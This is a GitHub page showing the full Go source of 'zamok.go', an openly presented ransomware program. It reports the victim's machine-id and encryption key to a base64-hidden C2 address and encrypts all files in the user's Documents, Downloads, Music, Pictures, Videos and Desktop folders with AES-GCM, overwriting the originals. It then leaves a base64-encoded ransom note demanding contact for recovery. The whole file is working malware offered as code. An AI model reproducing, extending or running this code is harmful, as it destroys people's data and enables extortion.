-
Notifications
You must be signed in to change notification settings - Fork 2
/
zamok.go
131 lines (112 loc) · 2.94 KB
/
zamok.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
// Author : Nemuel Wainaina
/*
https://github.com/nemzyxt
*/
package main
import (
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"math/rand"
"net/http"
"os"
"path/filepath"
"time"
)
const (
README string = "Desktop/README.txt"
C2 string = "aHR0cDovLzEyNy4wLjAuMTo4MDgwLwo="
NOTE string = "WU9VUiBGSUxFUyBIQVZFIEJFRU4gRU5DUllQVEVEICEhIQpEb24ndCBtYWtlIGFueSBzdHVwaWQgbW92ZSB0byBkZWNyeXB0IHRoZW0gb3IgZWxzZSB5b3Ugd2lsbCBoYXZlIHBlcm1hbmVudGx5IGxvc3QgYWNjZXNzIHRvIHRoZW0gISAKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjClRPIFJFQ09WRVIgVEhFTSA6CkNvbnRhY3QgdXMgaGVyZSBhbmQgcHJvdmlkZSB0aGlzIGFzIHlvdXIgaWQgOgo="
)
var (
TGT_DIRS = []string{"Documents", "Downloads", "Music", "Pictures", "Videos", "Desktop"}
)
func main() {
move_to_home()
// generate the encryption key
k := generate_key()
id := generate_id()
report(k, id)
// Encrypt the directories now :)
key := []byte(k)
for _, dir := range TGT_DIRS {
encrypt_dir(dir, key)
}
// Drop the Ransom Note
f, _ := os.Create(README)
f.WriteString(from_b64(NOTE) + " " + generate_id())
f.Close()
}
func generate_key() string {
key := make([]byte, 32)
pool := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
for i := range key {
rand.Seed(time.Now().UnixNano())
key[i] = pool[rand.Intn(len(pool))]
}
return string(key)
}
// unique identifier for the particular machine
func generate_id() string {
id, _ := os.ReadFile("/etc/machine-id")
return string(id)
}
// report details to C2
func report(key string, id string) {
if !is_online() {
time.Sleep(5 * time.Second)
report(key, id)
}
msg := id + ":" + key
http.Get(from_b64(C2) + "/" + to_b64(msg))
}
// return base64 encoding of str
func to_b64(str string) string {
return base64.StdEncoding.EncodeToString([]byte(str))
}
// decode a base64 string
func from_b64(str string) string {
res, _ := base64.RawURLEncoding.DecodeString(str)
return string(res)
}
// change to user's home directory
func move_to_home() {
homedir, _ := os.UserHomeDir()
os.Chdir(homedir)
}
// check whether the system is online
func is_online() bool {
_, err := http.Get("https://www.google.com")
return err == nil
}
// read the file and return its content
func read_file(file string) []byte {
content, _ := os.ReadFile(file)
return content
}
// encrypt the provided file
func encrypt_file(file string, key []byte) {
c, _ := aes.NewCipher(key)
gcm, _ := cipher.NewGCM(c)
nonce := make([]byte, gcm.NonceSize())
plaintext := read_file(file)
result := gcm.Seal(nonce, nonce, plaintext, nil)
os.WriteFile(file, result, 0666)
}
// return a list of all the files in the provided path
func list_files(path string) []string {
var files []string
filepath.Walk(path, func(p string, info os.FileInfo, err error) error {
if !info.IsDir() {
files = append(files, p)
}
return nil
})
return files
}
// encrypt all the files in dir
func encrypt_dir(dir string, key []byte) {
for _, file := range list_files(dir) {
encrypt_file(file, key)
}
}